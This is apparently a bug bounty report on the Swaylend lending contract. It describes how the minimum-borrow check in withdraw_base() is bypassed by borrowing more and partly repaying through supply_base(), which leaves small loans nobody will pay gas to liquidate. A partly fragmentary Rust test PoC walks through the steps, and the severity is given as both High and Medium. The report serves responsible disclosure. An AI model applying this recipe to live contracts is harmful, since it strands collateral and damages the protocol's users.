#35831 [SC-High] By bypassing base_borrow_min limitation borrows can create inabsorbable loans

Submitted on Oct 10th 2024 at 08:54:13 UTC by @SeveritySquad for IOP | Swaylend

  • Report ID: #35831

  • Report Type: Smart Contract

  • Report severity: High

  • Target: https://github.com/Swaylend/swaylend-monorepo/blob/develop/contracts/market/src/main.sw

  • Impacts:

    • Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

    • Contract fails to deliver promised returns, but doesn't lose value



The `withdraw_base()` contains a condition to prevent creation of loans smaller than `base_borrow_min` amount. This limitation can be bypassed, by creating a larger loan (higher than `base_borrow_min` amount) and repaying some portion of it so that the remaining part is lower than `base_borrow_min`.

Vulnerability Details

The `withdraw_base()` method contains the following condition: ``` require( u256::try_from(user_balance.wrapping_neg()) .unwrap() >= storage .market_configuration .read() .base_borrow_min, Error::BorrowTooSmall, ); ``` While it prevents a borrow for taking a too small loan, this check is not present in the `supply_base()`. As a result a user can take a larger loan and then repay immediately back some smaller portion so that the balance will eventually be lower than `base_borrow_min`.

Impact Details

The impact of this issue is that if those position are small enough they may not be worth to cover the gas cost of calling the `absorb()` for those accounts. Hence the collateral will be stuck in the contract as there would be no financial incentive to take out such a small amount. While those amounts are small they can amass over time on multiple accounts, hence the chosen severity is Medium as it falls into griefing category.


condition in the `withdraw_base()`: https://github.com/Swaylend/swaylend-monorepo/blob/bbfa0b0840311d0eb0519d2b4fed8bf9d06868cd/contracts/market/src/main.sw#L625

Proof of Concept

Proof of Concept

The PoC presents creation of a debt position of size `1`: ``` #[tokio::test] async fn poc_create_small_loan() { let TestData { wallets, alice, alice_account, bob, bob_account, chad, market, assets, usdc, eth, oracle, price_feed_ids, publish_time, prices, usdc_contract, .. } = setup().await;

let price_data_update = PriceDataUpdate {
    update_fee: 0,
    publish_times: vec![publish_time; assets.len()],
    update_data: oracle.create_update_data(&prices).await.unwrap(),

// =================================================
// ==================== Step #0 ====================
// 👛 Wallet: Alice 🧛
// 🤙 Call: supply_base
// 💰 Amount: 3000.00 USDC
let alice_supply_amount = parse_units(3000 * AMOUNT_COEFFICIENT, usdc.decimals);
let alice_mint_amount = parse_units(4000 * AMOUNT_COEFFICIENT, usdc.decimals);
let alice_supply_log_amount = format!("{} USDC", alice_supply_amount as f64 / SCALE_6);
print_case_title(0, "Alice", "supply_base", alice_supply_log_amount.as_str());
println!("💸 Alice + {alice_supply_log_amount}");
    .mint(alice_account, alice_mint_amount)
let balance = alice.get_asset_balance(&usdc.asset_id).await.unwrap();
assert!(balance == alice_mint_amount);

let alice_supply_res = market
    .supply_base(usdc.asset_id, alice_supply_amount)

// =================================================
// ==================== Step #1 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: supply_collateral
// 💰 Amount: 1.00 ETH
let bob_supply_amount = parse_units(1 * AMOUNT_COEFFICIENT, eth.decimals);
let bob_supply_res = market
    .supply_collateral(eth.asset_id, bob_supply_amount)

let bob_user_collateral = market
    .get_user_collateral(bob_account, eth.asset_id)
assert!(bob_user_collateral == bob_supply_amount);

    .print_debug_state(&wallets, &usdc, &eth)


// =================================================
// ==================== Step #2 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: withdraw_base
// 💰 Amount: <MAX HE CAN BORROW>
let max_borrow_amount = market
    .available_to_borrow(&[&oracle.instance], bob_account)
let log_amount = format!("{} USDC", max_borrow_amount as f64 / SCALE_6);
print_case_title(2, "Bob", "withdraw_base", &log_amount.as_str());
let bob_borrow_res = market

let balance = bob.get_asset_balance(&usdc.asset_id).await.unwrap();
assert!(balance == max_borrow_amount as u64);
    .print_debug_state(&wallets, &usdc, &eth)

// =================================================
// ==================== Step #3 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: withdraw_base 
// 💰 Amount: <max he can borrow - 1>

//let tx_policies = TxPolicies::default().with_script_gas_limit(1_000_000);

// Withdraw base
    // Supply base
let supply_base_call = market
    .supply_base(usdc.asset_id, max_borrow_amount as u64 - 1)

// Check borrow amount of bob
let (_, borrow) = market.get_user_supply_borrow(bob_account).await.unwrap();

println!("Bob's borrow amount: {} ", borrow);

} ```

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